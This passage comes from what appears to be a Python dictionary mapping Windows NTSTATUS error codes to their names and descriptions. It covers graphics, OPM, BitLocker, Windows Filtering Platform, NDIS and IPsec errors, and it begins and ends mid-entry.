("STATUS_GRAPHICS_INVALID_SCANLINE_ORDERING","The specified scan line ordering type is invalid."), 0xC01E0353: ("STATUS_GRAPHICS_TOPOLOGY_CHANGES_NOT_ALLOWED","The topology changes are not allowed for the specified VidPN."), 0xC01E0354: ("STATUS_GRAPHICS_NO_AVAILABLE_IMPORTANCE_ORDINALS","All available importance ordinals are being used in the specified topology."), 0xC01E0355: ("STATUS_GRAPHICS_INCOMPATIBLE_PRIVATE_FORMAT","The specified primary surface has a different private-format attribute than the current primary surface."), 0xC01E0356: ("STATUS_GRAPHICS_INVALID_MODE_PRUNING_ALGORITHM","The specified mode-pruning algorithm is invalid."), 0xC01E0357: ("STATUS_GRAPHICS_INVALID_MONITOR_CAPABILITY_ORIGIN","The specified monitor-capability origin is invalid."), 0xC01E0358: ("STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE_CONSTRAINT","The specified monitor-frequency range constraint is invalid."), 0xC01E0359: ("STATUS_GRAPHICS_MAX_NUM_PATHS_REACHED","The maximum supported number of present paths has been reached."), 0xC01E035A: ("STATUS_GRAPHICS_CANCEL_VIDPN_TOPOLOGY_AUGMENTATION","The miniport requested that augmentation be canceled for the specified source of the specified VidPN's topology."), 0xC01E035B: ("STATUS_GRAPHICS_INVALID_CLIENT_TYPE","The specified client type was not recognized."), 0xC01E035C: ("STATUS_GRAPHICS_CLIENTVIDPN_NOT_SET","The client VidPN is not set on this adapter (for example, no user mode-initiated mode changes have taken place on this adapter)."), 0xC01E0400: ("STATUS_GRAPHICS_SPECIFIED_CHILD_ALREADY_CONNECTED","The specified display adapter child device already has an external device connected to it."), 0xC01E0401: ("STATUS_GRAPHICS_CHILD_DESCRIPTOR_NOT_SUPPORTED","The display adapter child device does not support reporting a descriptor."), 0xC01E0430: ("STATUS_GRAPHICS_NOT_A_LINKED_ADAPTER","The display adapter is not linked to any other adapters."), 0xC01E0431: ("STATUS_GRAPHICS_LEADLINK_NOT_ENUMERATED","The lead adapter in a linked configuration was not enumerated yet."), 0xC01E0432: ("STATUS_GRAPHICS_CHAINLINKS_NOT_ENUMERATED","Some chain adapters in a linked configuration have not yet been enumerated."), 0xC01E0433: ("STATUS_GRAPHICS_ADAPTER_CHAIN_NOT_READY","The chain of linked adapters is not ready to start because of an unknown failure."), 0xC01E0434: ("STATUS_GRAPHICS_CHAINLINKS_NOT_STARTED","An attempt was made to start a lead link display adapter when the chain links had not yet started."), 0xC01E0435: ("STATUS_GRAPHICS_CHAINLINKS_NOT_POWERED_ON","An attempt was made to turn on a lead link display adapter when the chain links were turned off."), 0xC01E0436: ("STATUS_GRAPHICS_INCONSISTENT_DEVICE_LINK_STATE","The adapter link was found in an inconsistent state. Not all adapters are in an expected PNP/power state."), 0xC01E0438: ("STATUS_GRAPHICS_NOT_POST_DEVICE_DRIVER","The driver trying to start is not the same as the driver for the posted display adapter."), 0xC01E043B: ("STATUS_GRAPHICS_ADAPTER_ACCESS_NOT_EXCLUDED","An operation is being attempted that requires the display adapter to be in a quiescent state."), 0xC01E0500: ("STATUS_GRAPHICS_OPM_NOT_SUPPORTED","The driver does not support OPM."), 0xC01E0501: ("STATUS_GRAPHICS_COPP_NOT_SUPPORTED","The driver does not support COPP."), 0xC01E0502: ("STATUS_GRAPHICS_UAB_NOT_SUPPORTED","The driver does not support UAB."), 0xC01E0503: ("STATUS_GRAPHICS_OPM_INVALID_ENCRYPTED_PARAMETERS","The specified encrypted parameters are invalid."), 0xC01E0504: ("STATUS_GRAPHICS_OPM_PARAMETER_ARRAY_TOO_SMALL","An array passed to a function cannot hold all of the data that the function wants to put in it."), 0xC01E0505: ("STATUS_GRAPHICS_OPM_NO_PROTECTED_OUTPUTS_EXIST","The GDI display device passed to this function does not have any active protected outputs."), 0xC01E0506: ("STATUS_GRAPHICS_PVP_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME","The PVP cannot find an actual GDI display device that corresponds to the passed-in GDI display device name."), 0xC01E0507: ("STATUS_GRAPHICS_PVP_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP","This function failed because the GDI display device passed to it was not attached to the Windows desktop."), 0xC01E0508: ("STATUS_GRAPHICS_PVP_MIRRORING_DEVICES_NOT_SUPPORTED","The PVP does not support mirroring display devices because they do not have any protected outputs."), 0xC01E050A: ("STATUS_GRAPHICS_OPM_INVALID_POINTER","The function failed because an invalid pointer parameter was passed to it. A pointer parameter is invalid if it is null, is not correctly aligned, or it points to an invalid address or a kernel mode address."), 0xC01E050B: ("STATUS_GRAPHICS_OPM_INTERNAL_ERROR","An internal error caused an operation to fail."), 0xC01E050C: ("STATUS_GRAPHICS_OPM_INVALID_HANDLE","The function failed because the caller passed in an invalid OPM user-mode handle."), 0xC01E050D: ("STATUS_GRAPHICS_PVP_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE","This function failed because the GDI device passed to it did not have any monitors associated with it."), 0xC01E050E: ("STATUS_GRAPHICS_PVP_INVALID_CERTIFICATE_LENGTH","A certificate could not be returned because the certificate buffer passed to the function was too small."), 0xC01E050F: ("STATUS_GRAPHICS_OPM_SPANNING_MODE_ENABLED","DxgkDdiOpmCreateProtectedOutput() could not create a protected output because the video present yarget is in spanning mode."), 0xC01E0510: ("STATUS_GRAPHICS_OPM_THEATER_MODE_ENABLED","DxgkDdiOpmCreateProtectedOutput() could not create a protected output because the video present target is in theater mode."), 0xC01E0511: ("STATUS_GRAPHICS_PVP_HFS_FAILED","The function call failed because the display adapter's hardware functionality scan (HFS) failed to validate the graphics hardware."), 0xC01E0512: ("STATUS_GRAPHICS_OPM_INVALID_SRM","The HDCP SRM passed to this function did not comply with section 5 of the HDCP 1.1 specification."), 0xC01E0513: ("STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_HDCP","The protected output cannot enable the HDCP system because it does not support it."), 0xC01E0514: ("STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_ACP","The protected output cannot enable analog copy protection because it does not support it."), 0xC01E0515: ("STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_CGMSA","The protected output cannot enable the CGMS-A protection technology because it does not support it."), 0xC01E0516: ("STATUS_GRAPHICS_OPM_HDCP_SRM_NEVER_SET","DxgkDdiOPMGetInformation() cannot return the version of the SRM being used because the application never successfully passed an SRM to the protected output."), 0xC01E0517: ("STATUS_GRAPHICS_OPM_RESOLUTION_TOO_HIGH","DxgkDdiOPMConfigureProtectedOutput() cannot enable the specified output protection technology because the output's screen resolution is too high."), 0xC01E0518: ("STATUS_GRAPHICS_OPM_ALL_HDCP_HARDWARE_ALREADY_IN_USE","DxgkDdiOPMConfigureProtectedOutput() cannot enable HDCP because other physical outputs are using the display adapter's HDCP hardware."), 0xC01E051A: ("STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_NO_LONGER_EXISTS","The operating system asynchronously destroyed this OPM-protected output because the operating system state changed. This error typically occurs because the monitor PDO associated with this protected output was removed or stopped, the protected output's session became a nonconsole session, or the protected output's desktop became inactive."), 0xC01E051B: ("STATUS_GRAPHICS_OPM_SESSION_TYPE_CHANGE_IN_PROGRESS","OPM functions cannot be called when a session is changing its type. Three types of sessions currently exist: console, disconnected, and remote (RDP or ICA)."), 0xC01E051C: ("STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_COPP_SEMANTICS","The DxgkDdiOPMGetCOPPCompatibleInformation, DxgkDdiOPMGetInformation, or DxgkDdiOPMConfigureProtectedOutput function failed. This error is returned only if a protected output has OPM semantics. DxgkDdiOPMGetCOPPCompatibleInformation always returns this error if a protected output has OPM semantics. DxgkDdiOPMGetInformation returns this error code if the caller requested COPP-specific information. DxgkDdiOPMConfigureProtectedOutput returns this error when the caller tries to use a COPP-specific command."), 0xC01E051D: ("STATUS_GRAPHICS_OPM_INVALID_INFORMATION_REQUEST","The DxgkDdiOPMGetInformation and DxgkDdiOPMGetCOPPCompatibleInformation functions return this error code if the passed-in sequence number is not the expected sequence number or the passed-in OMAC value is invalid."), 0xC01E051E: ("STATUS_GRAPHICS_OPM_DRIVER_INTERNAL_ERROR","The function failed because an unexpected error occurred inside a display driver."), 0xC01E051F: ("STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_OPM_SEMANTICS","The DxgkDdiOPMGetCOPPCompatibleInformation, DxgkDdiOPMGetInformation, or DxgkDdiOPMConfigureProtectedOutput function failed. This error is returned only if a protected output has COPP semantics. DxgkDdiOPMGetCOPPCompatibleInformation returns this error code if the caller requested OPM-specific information. DxgkDdiOPMGetInformation always returns this error if a protected output has COPP semantics. DxgkDdiOPMConfigureProtectedOutput returns this error when the caller tries to use an OPM-specific command."), 0xC01E0520: ("STATUS_GRAPHICS_OPM_SIGNALING_NOT_SUPPORTED","The DxgkDdiOPMGetCOPPCompatibleInformation and DxgkDdiOPMConfigureProtectedOutput functions return this error if the display driver does not support the DXGKMDT_OPM_GET_ACP_AND_CGMSA_SIGNALING and DXGKMDT_OPM_SET_ACP_AND_CGMSA_SIGNALING GUIDs."), 0xC01E0521: ("STATUS_GRAPHICS_OPM_INVALID_CONFIGURATION_REQUEST","The DxgkDdiOPMConfigureProtectedOutput function returns this error code if the passed-in sequence number is not the expected sequence number or the passed-in OMAC value is invalid."), 0xC01E0580: ("STATUS_GRAPHICS_I2C_NOT_SUPPORTED","The monitor connected to the specified video output does not have an I2C bus."), 0xC01E0581: ("STATUS_GRAPHICS_I2C_DEVICE_DOES_NOT_EXIST","No device on the I2C bus has the specified address."), 0xC01E0582: ("STATUS_GRAPHICS_I2C_ERROR_TRANSMITTING_DATA","An error occurred while transmitting data to the device on the I2C bus."), 0xC01E0583: ("STATUS_GRAPHICS_I2C_ERROR_RECEIVING_DATA","An error occurred while receiving data from the device on the I2C bus."), 0xC01E0584: ("STATUS_GRAPHICS_DDCCI_VCP_NOT_SUPPORTED","The monitor does not support the specified VCP code."), 0xC01E0585: ("STATUS_GRAPHICS_DDCCI_INVALID_DATA","The data received from the monitor is invalid."), 0xC01E0586: ("STATUS_GRAPHICS_DDCCI_MONITOR_RETURNED_INVALID_TIMING_STATUS_BYTE","A function call failed because a monitor returned an invalid timing status byte when the operating system used the DDC/CI get timing report and timing message command to get a timing report from a monitor."), 0xC01E0587: ("STATUS_GRAPHICS_DDCCI_INVALID_CAPABILITIES_STRING","A monitor returned a DDC/CI capabilities string that did not comply with the ACCESS.bus 3.0, DDC/CI 1.1, or MCCS 2 Revision 1 specification."), 0xC01E0588: ("STATUS_GRAPHICS_MCA_INTERNAL_ERROR","An internal error caused an operation to fail."), 0xC01E0589: ("STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_COMMAND","An operation failed because a DDC/CI message had an invalid value in its command field."), 0xC01E058A: ("STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_LENGTH","This error occurred because a DDC/CI message had an invalid value in its length field."), 0xC01E058B: ("STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_CHECKSUM","This error occurred because the value in a DDC/CI message's checksum field did not match the message's computed checksum value. This error implies that the data was corrupted while it was being transmitted from a monitor to a computer."), 0xC01E058C: ("STATUS_GRAPHICS_INVALID_PHYSICAL_MONITOR_HANDLE","This function failed because an invalid monitor handle was passed to it."), 0xC01E058D: ("STATUS_GRAPHICS_MONITOR_NO_LONGER_EXISTS","The operating system asynchronously destroyed the monitor that corresponds to this handle because the operating system's state changed. This error typically occurs because the monitor PDO associated with this handle was removed or stopped, or a display mode change occurred. A display mode change occurs when Windows sends a WM_DISPLAYCHANGE message to applications."), 0xC01E05E0: ("STATUS_GRAPHICS_ONLY_CONSOLE_SESSION_SUPPORTED","This function can be used only if a program is running in the local console session. It cannot be used if a program is running on a remote desktop session or on a terminal server session."), 0xC01E05E1: ("STATUS_GRAPHICS_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME","This function cannot find an actual GDI display device that corresponds to the specified GDI display device name."), 0xC01E05E2: ("STATUS_GRAPHICS_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP","The function failed because the specified GDI display device was not attached to the Windows desktop."), 0xC01E05E3: ("STATUS_GRAPHICS_MIRRORING_DEVICES_NOT_SUPPORTED","This function does not support GDI mirroring display devices because GDI mirroring display devices do not have any physical monitors associated with them."), 0xC01E05E4: ("STATUS_GRAPHICS_INVALID_POINTER","The function failed because an invalid pointer parameter was passed to it. A pointer parameter is invalid if it is null, is not correctly aligned, or points to an invalid address or to a kernel mode address."), 0xC01E05E5: ("STATUS_GRAPHICS_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE","This function failed because the GDI device passed to it did not have a monitor associated with it."), 0xC01E05E6: ("STATUS_GRAPHICS_PARAMETER_ARRAY_TOO_SMALL","An array passed to the function cannot hold all of the data that the function must copy into the array."), 0xC01E05E7: ("STATUS_GRAPHICS_INTERNAL_ERROR","An internal error caused an operation to fail."), 0xC01E05E8: ("STATUS_GRAPHICS_SESSION_TYPE_CHANGE_IN_PROGRESS","The function failed because the current session is changing its type. This function cannot be called when the current session is changing its type. Three types of sessions currently exist: console, disconnected, and remote (RDP or ICA)."), 0xC0210000: ("STATUS_FVE_LOCKED_VOLUME","The volume must be unlocked before it can be used."), 0xC0210001: ("STATUS_FVE_NOT_ENCRYPTED","The volume is fully decrypted and no key is available."), 0xC0210002: ("STATUS_FVE_BAD_INFORMATION","The control block for the encrypted volume is not valid."), 0xC0210003: ("STATUS_FVE_TOO_SMALL","Not enough free space remains on the volume to allow encryption."), 0xC0210004: ("STATUS_FVE_FAILED_WRONG_FS","The partition cannot be encrypted because the file system is not supported."), 0xC0210005: ("STATUS_FVE_FAILED_BAD_FS","The file system is inconsistent. Run the Check Disk utility."), 0xC0210006: ("STATUS_FVE_FS_NOT_EXTENDED","The file system does not extend to the end of the volume."), 0xC0210007: ("STATUS_FVE_FS_MOUNTED","This operation cannot be performed while a file system is mounted on the volume."), 0xC0210008: ("STATUS_FVE_NO_LICENSE","BitLocker Drive Encryption is not included with this version of Windows."), 0xC0210009: ("STATUS_FVE_ACTION_NOT_ALLOWED","The requested action was denied by the FVE control engine."), 0xC021000A: ("STATUS_FVE_BAD_DATA","The data supplied is malformed."), 0xC021000B: ("STATUS_FVE_VOLUME_NOT_BOUND","The volume is not bound to the system."), 0xC021000C: ("STATUS_FVE_NOT_DATA_VOLUME","The volume specified is not a data volume."), 0xC021000D: ("STATUS_FVE_CONV_READ_ERROR","A read operation failed while converting the volume."), 0xC021000E: ("STATUS_FVE_CONV_WRITE_ERROR","A write operation failed while converting the volume."), 0xC021000F: ("STATUS_FVE_OVERLAPPED_UPDATE","The control block for the encrypted volume was updated by another thread. Try again."), 0xC0210010: ("STATUS_FVE_FAILED_SECTOR_SIZE","The volume encryption algorithm cannot be used on this sector size."), 0xC0210011: ("STATUS_FVE_FAILED_AUTHENTICATION","BitLocker recovery authentication failed."), 0xC0210012: ("STATUS_FVE_NOT_OS_VOLUME","The volume specified is not the boot operating system volume."), 0xC0210013: ("STATUS_FVE_KEYFILE_NOT_FOUND","The BitLocker startup key or recovery password could not be read from external media."), 0xC0210014: ("STATUS_FVE_KEYFILE_INVALID","The BitLocker startup key or recovery password file is corrupt or invalid."), 0xC0210015: ("STATUS_FVE_KEYFILE_NO_VMK","The BitLocker encryption key could not be obtained from the startup key or the recovery password."), 0xC0210016: ("STATUS_FVE_TPM_DISABLED","The TPM is disabled."), 0xC0210017: ("STATUS_FVE_TPM_SRK_AUTH_NOT_ZERO","The authorization data for the SRK of the TPM is not zero."), 0xC0210018: ("STATUS_FVE_TPM_INVALID_PCR","The system boot information changed or the TPM locked out access to BitLocker encryption keys until the computer is restarted."), 0xC0210019: ("STATUS_FVE_TPM_NO_VMK","The BitLocker encryption key could not be obtained from the TPM."), 0xC021001A: ("STATUS_FVE_PIN_INVALID","The BitLocker encryption key could not be obtained from the TPM and PIN."), 0xC021001B: ("STATUS_FVE_AUTH_INVALID_APPLICATION","A boot application hash does not match the hash computed when BitLocker was turned on."), 0xC021001C: ("STATUS_FVE_AUTH_INVALID_CONFIG","The Boot Configuration Data (BCD) settings are not supported or have changed because BitLocker was enabled."), 0xC021001D: ("STATUS_FVE_DEBUGGER_ENABLED","Boot debugging is enabled. Run Windows Boot Configuration Data Store Editor (bcdedit.exe) to turn it off."), 0xC021001E: ("STATUS_FVE_DRY_RUN_FAILED","The BitLocker encryption key could not be obtained."), 0xC021001F: ("STATUS_FVE_BAD_METADATA_POINTER","The metadata disk region pointer is incorrect."), 0xC0210020: ("STATUS_FVE_OLD_METADATA_COPY","The backup copy of the metadata is out of date."), 0xC0210021: ("STATUS_FVE_REBOOT_REQUIRED","No action was taken because a system restart is required."), 0xC0210022: ("STATUS_FVE_RAW_ACCESS","No action was taken because BitLocker Drive Encryption is in RAW access mode."), 0xC0210023: ("STATUS_FVE_RAW_BLOCKED","BitLocker Drive Encryption cannot enter RAW access mode for this volume."), 0xC0210026: ("STATUS_FVE_NO_FEATURE_LICENSE","This feature of BitLocker Drive Encryption is not included with this version of Windows."), 0xC0210027: ("STATUS_FVE_POLICY_USER_DISABLE_RDV_NOT_ALLOWED","Group policy does not permit turning off BitLocker Drive Encryption on roaming data volumes."), 0xC0210028: ("STATUS_FVE_CONV_RECOVERY_FAILED","Bitlocker Drive Encryption failed to recover from aborted conversion. This could be due to either all conversion logs being corrupted or the media being write-protected."), 0xC0210029: ("STATUS_FVE_VIRTUALIZED_SPACE_TOO_BIG","The requested virtualization size is too big."), 0xC0210030: ("STATUS_FVE_VOLUME_TOO_SMALL","The drive is too small to be protected using BitLocker Drive Encryption."), 0xC0220001: ("STATUS_FWP_CALLOUT_NOT_FOUND","The callout does not exist."), 0xC0220002: ("STATUS_FWP_CONDITION_NOT_FOUND","The filter condition does not exist."), 0xC0220003: ("STATUS_FWP_FILTER_NOT_FOUND","The filter does not exist."), 0xC0220004: ("STATUS_FWP_LAYER_NOT_FOUND","The layer does not exist."), 0xC0220005: ("STATUS_FWP_PROVIDER_NOT_FOUND","The provider does not exist."), 0xC0220006: ("STATUS_FWP_PROVIDER_CONTEXT_NOT_FOUND","The provider context does not exist."), 0xC0220007: ("STATUS_FWP_SUBLAYER_NOT_FOUND","The sublayer does not exist."), 0xC0220008: ("STATUS_FWP_NOT_FOUND","The object does not exist."), 0xC0220009: ("STATUS_FWP_ALREADY_EXISTS","An object with that GUID or LUID already exists."), 0xC022000A: ("STATUS_FWP_IN_USE","The object is referenced by other objects and cannot be deleted."), 0xC022000B: ("STATUS_FWP_DYNAMIC_SESSION_IN_PROGRESS","The call is not allowed from within a dynamic session."), 0xC022000C: ("STATUS_FWP_WRONG_SESSION","The call was made from the wrong session and cannot be completed."), 0xC022000D: ("STATUS_FWP_NO_TXN_IN_PROGRESS","The call must be made from within an explicit transaction."), 0xC022000E: ("STATUS_FWP_TXN_IN_PROGRESS","The call is not allowed from within an explicit transaction."), 0xC022000F: ("STATUS_FWP_TXN_ABORTED","The explicit transaction has been forcibly canceled."), 0xC0220010: ("STATUS_FWP_SESSION_ABORTED","The session has been canceled."), 0xC0220011: ("STATUS_FWP_INCOMPATIBLE_TXN","The call is not allowed from within a read-only transaction."), 0xC0220012: ("STATUS_FWP_TIMEOUT","The call timed out while waiting to acquire the transaction lock."), 0xC0220013: ("STATUS_FWP_NET_EVENTS_DISABLED","The collection of network diagnostic events is disabled."), 0xC0220014: ("STATUS_FWP_INCOMPATIBLE_LAYER","The operation is not supported by the specified layer."), 0xC0220015: ("STATUS_FWP_KM_CLIENTS_ONLY","The call is allowed for kernel-mode callers only."), 0xC0220016: ("STATUS_FWP_LIFETIME_MISMATCH","The call tried to associate two objects with incompatible lifetimes."), 0xC0220017: ("STATUS_FWP_BUILTIN_OBJECT","The object is built-in and cannot be deleted."), 0xC0220018: ("STATUS_FWP_TOO_MANY_BOOTTIME_FILTERS","The maximum number of boot-time filters has been reached."), 0xC0220018: ("STATUS_FWP_TOO_MANY_CALLOUTS","The maximum number of callouts has been reached."), 0xC0220019: ("STATUS_FWP_NOTIFICATION_DROPPED","A notification could not be delivered because a message queue has reached maximum capacity."), 0xC022001A: ("STATUS_FWP_TRAFFIC_MISMATCH","The traffic parameters do not match those for the security association context."), 0xC022001B: ("STATUS_FWP_INCOMPATIBLE_SA_STATE","The call is not allowed for the current security association state."), 0xC022001C: ("STATUS_FWP_NULL_POINTER","A required pointer is null."), 0xC022001D: ("STATUS_FWP_INVALID_ENUMERATOR","An enumerator is not valid."), 0xC022001E: ("STATUS_FWP_INVALID_FLAGS","The flags field contains an invalid value."), 0xC022001F: ("STATUS_FWP_INVALID_NET_MASK","A network mask is not valid."), 0xC0220020: ("STATUS_FWP_INVALID_RANGE","An FWP_RANGE is not valid."), 0xC0220021: ("STATUS_FWP_INVALID_INTERVAL","The time interval is not valid."), 0xC0220022: ("STATUS_FWP_ZERO_LENGTH_ARRAY","An array that must contain at least one element has a zero length."), 0xC0220023: ("STATUS_FWP_NULL_DISPLAY_NAME","The displayData.name field cannot be null."), 0xC0220024: ("STATUS_FWP_INVALID_ACTION_TYPE","The action type is not one of the allowed action types for a filter."), 0xC0220025: ("STATUS_FWP_INVALID_WEIGHT","The filter weight is not valid."), 0xC0220026: ("STATUS_FWP_MATCH_TYPE_MISMATCH","A filter condition contains a match type that is not compatible with the operands."), 0xC0220027: ("STATUS_FWP_TYPE_MISMATCH","An FWP_VALUE or FWPM_CONDITION_VALUE is of the wrong type."), 0xC0220028: ("STATUS_FWP_OUT_OF_BOUNDS","An integer value is outside the allowed range."), 0xC0220029: ("STATUS_FWP_RESERVED","A reserved field is nonzero."), 0xC022002A: ("STATUS_FWP_DUPLICATE_CONDITION","A filter cannot contain multiple conditions operating on a single field."), 0xC022002B: ("STATUS_FWP_DUPLICATE_KEYMOD","A policy cannot contain the same keying module more than once."), 0xC022002C: ("STATUS_FWP_ACTION_INCOMPATIBLE_WITH_LAYER","The action type is not compatible with the layer."), 0xC022002D: ("STATUS_FWP_ACTION_INCOMPATIBLE_WITH_SUBLAYER","The action type is not compatible with the sublayer."), 0xC022002E: ("STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_LAYER","The raw context or the provider context is not compatible with the layer."), 0xC022002F: ("STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_CALLOUT","The raw context or the provider context is not compatible with the callout."), 0xC0220030: ("STATUS_FWP_INCOMPATIBLE_AUTH_METHOD","The authentication method is not compatible with the policy type."), 0xC0220031: ("STATUS_FWP_INCOMPATIBLE_DH_GROUP","The Diffie-Hellman group is not compatible with the policy type."), 0xC0220032: ("STATUS_FWP_EM_NOT_SUPPORTED","An IKE policy cannot contain an Extended Mode policy."), 0xC0220033: ("STATUS_FWP_NEVER_MATCH","The enumeration template or subscription will never match any objects."), 0xC0220034: ("STATUS_FWP_PROVIDER_CONTEXT_MISMATCH","The provider context is of the wrong type."), 0xC0220035: ("STATUS_FWP_INVALID_PARAMETER","The parameter is incorrect."), 0xC0220036: ("STATUS_FWP_TOO_MANY_SUBLAYERS","The maximum number of sublayers has been reached."), 0xC0220037: ("STATUS_FWP_CALLOUT_NOTIFICATION_FAILED","The notification function for a callout returned an error."), 0xC0220038: ("STATUS_FWP_INCOMPATIBLE_AUTH_CONFIG","The IPsec authentication configuration is not compatible with the authentication type."), 0xC0220039: ("STATUS_FWP_INCOMPATIBLE_CIPHER_CONFIG","The IPsec cipher configuration is not compatible with the cipher type."), 0xC022003C: ("STATUS_FWP_DUPLICATE_AUTH_METHOD","A policy cannot contain the same auth method more than once."), 0xC0220100: ("STATUS_FWP_TCPIP_NOT_READY","The TCP/IP stack is not ready."), 0xC0220101: ("STATUS_FWP_INJECT_HANDLE_CLOSING","The injection handle is being closed by another thread."), 0xC0220102: ("STATUS_FWP_INJECT_HANDLE_STALE","The injection handle is stale."), 0xC0220103: ("STATUS_FWP_CANNOT_PEND","The classify cannot be pended."), 0xC0230002: ("STATUS_NDIS_CLOSING","The binding to the network interface is being closed."), 0xC0230004: ("STATUS_NDIS_BAD_VERSION","An invalid version was specified."), 0xC0230005: ("STATUS_NDIS_BAD_CHARACTERISTICS","An invalid characteristics table was used."), 0xC0230006: ("STATUS_NDIS_ADAPTER_NOT_FOUND","Failed to find the network interface or the network interface is not ready."), 0xC0230007: ("STATUS_NDIS_OPEN_FAILED","Failed to open the network interface."), 0xC0230008: ("STATUS_NDIS_DEVICE_FAILED","The network interface has encountered an internal unrecoverable failure."), 0xC0230009: ("STATUS_NDIS_MULTICAST_FULL","The multicast list on the network interface is full."), 0xC023000A: ("STATUS_NDIS_MULTICAST_EXISTS","An attempt was made to add a duplicate multicast address to the list."), 0xC023000B: ("STATUS_NDIS_MULTICAST_NOT_FOUND","At attempt was made to remove a multicast address that was never added."), 0xC023000C: ("STATUS_NDIS_REQUEST_ABORTED","The network interface aborted the request."), 0xC023000D: ("STATUS_NDIS_RESET_IN_PROGRESS","The network interface cannot process the request because it is being reset."), 0xC023000F: ("STATUS_NDIS_INVALID_PACKET","An attempt was made to send an invalid packet on a network interface."), 0xC0230010: ("STATUS_NDIS_INVALID_DEVICE_REQUEST","The specified request is not a valid operation for the target device."), 0xC0230011: ("STATUS_NDIS_ADAPTER_NOT_READY","The network interface is not ready to complete this operation."), 0xC0230014: ("STATUS_NDIS_INVALID_LENGTH","The length of the buffer submitted for this operation is not valid."), 0xC0230015: ("STATUS_NDIS_INVALID_DATA","The data used for this operation is not valid."), 0xC0230016: ("STATUS_NDIS_BUFFER_TOO_SHORT","The length of the submitted buffer for this operation is too small."), 0xC0230017: ("STATUS_NDIS_INVALID_OID","The network interface does not support this object identifier."), 0xC0230018: ("STATUS_NDIS_ADAPTER_REMOVED","The network interface has been removed."), 0xC0230019: ("STATUS_NDIS_UNSUPPORTED_MEDIA","The network interface does not support this media type."), 0xC023001A: ("STATUS_NDIS_GROUP_ADDRESS_IN_USE","An attempt was made to remove a token ring group address that is in use by other components."), 0xC023001B: ("STATUS_NDIS_FILE_NOT_FOUND","An attempt was made to map a file that cannot be found."), 0xC023001C: ("STATUS_NDIS_ERROR_READING_FILE","An error occurred while NDIS tried to map the file."), 0xC023001D: ("STATUS_NDIS_ALREADY_MAPPED","An attempt was made to map a file that is already mapped."), 0xC023001E: ("STATUS_NDIS_RESOURCE_CONFLICT","An attempt to allocate a hardware resource failed because the resource is used by another component."), 0xC023001F: ("STATUS_NDIS_MEDIA_DISCONNECTED","The I/O operation failed because the network media is disconnected or the wireless access point is out of range."), 0xC0230022: ("STATUS_NDIS_INVALID_ADDRESS","The network address used in the request is invalid."), 0xC023002A: ("STATUS_NDIS_PAUSED","The offload operation on the network interface has been paused."), 0xC023002B: ("STATUS_NDIS_INTERFACE_NOT_FOUND","The network interface was not found."), 0xC023002C: ("STATUS_NDIS_UNSUPPORTED_REVISION","The revision number specified in the structure is not supported."), 0xC023002D: ("STATUS_NDIS_INVALID_PORT","The specified port does not exist on this network interface."), 0xC023002E: ("STATUS_NDIS_INVALID_PORT_STATE","The current state of the specified port on this network interface does not support the requested operation."), 0xC023002F: ("STATUS_NDIS_LOW_POWER_STATE","The miniport adapter is in a lower power state."), 0xC02300BB: ("STATUS_NDIS_NOT_SUPPORTED","The network interface does not support this request."), 0xC023100F: ("STATUS_NDIS_OFFLOAD_POLICY","The TCP connection is not offloadable because of a local policy setting."), 0xC0231012: ("STATUS_NDIS_OFFLOAD_CONNECTION_REJECTED","The TCP connection is not offloadable by the Chimney offload target."), 0xC0231013: ("STATUS_NDIS_OFFLOAD_PATH_REJECTED","The IP Path object is not in an offloadable state."), 0xC0232000: ("STATUS_NDIS_DOT11_AUTO_CONFIG_ENABLED","The wireless LAN interface is in auto-configuration mode and does not support the requested parameter change operation."), 0xC0232001: ("STATUS_NDIS_DOT11_MEDIA_IN_USE","The wireless LAN interface is busy and cannot perform the requested operation."), 0xC0232002: ("STATUS_NDIS_DOT11_POWER_STATE_INVALID","The wireless LAN interface is power down and does not support the requested operation."), 0xC0232003: ("STATUS_NDIS_PM_WOL_PATTERN_LIST_FULL","The list of wake on LAN patterns is full."), 0xC0232004: ("STATUS_NDIS_PM_PROTOCOL_OFFLOAD_LIST_FULL","The list of low power protocol offloads is full."), 0xC0360001: ("STATUS_IPSEC_BAD_SPI","The SPI in the packet does not match a valid IPsec SA."), 0xC0360002: ("STATUS_IPSEC_SA_LIFETIME_EXPIRED","The packet was received on an IPsec SA whose lifetime has expired."), 0xC0360003: ("STATUS_IPSEC_WRONG_SA","The packet was received on an IPsec SA that does not match the packet characteristics."), 0xC0360004: ("STATUS_IPSEC_REPLAY_CHECK_FAILED","The packet sequence number replay check failed."), 0xC0360005: ("STATUS_IPSEC_INVALID_PACKET","The IPsec header and/or trailer in the packet is invalid."), 0xC0360006: ("STATUS_IPSEC_INTEGRITY_CHECK_FAILED","The IPsec integrity check failed."), 0xC0360007: ("STATUS_IPSEC_CLEAR_TEXT_DROP","IPsec dropped a clear text packet."), 0xC0360008: ("STATUS_IPSEC_AUTH_FIREWALL_DROP","IPsec dropped an incoming ESP packet in authenticated firewall mode. This drop is benign."), 0xC0360009: ("STATUS_IPSEC_THROTTLE_DROP","IPsec dropped a packet due to DOS throttle."), 0xC0368000: ("STATUS_IPSEC_DOSP_BLOCK","IPsec Dos Protection matched an explicit block rule."), 0xC0368001: ("STATUS_IPSEC_DOSP_RECEIVED_MULTICAST","IPsec Dos Protection received an IPsec specific multicast packet which is not allowed."), 0xC0368002: ("STATUS_IPSEC_DOSP_INVALID_PACKET","IPsec Dos Protection received an incorrectly formatted packet."), 0xC0368003: ("STATUS_IPSEC_DOSP_STATE_LOOKUP_FAILED","IPsec Dos Protection failed to lookup state."), 0xC0368004: 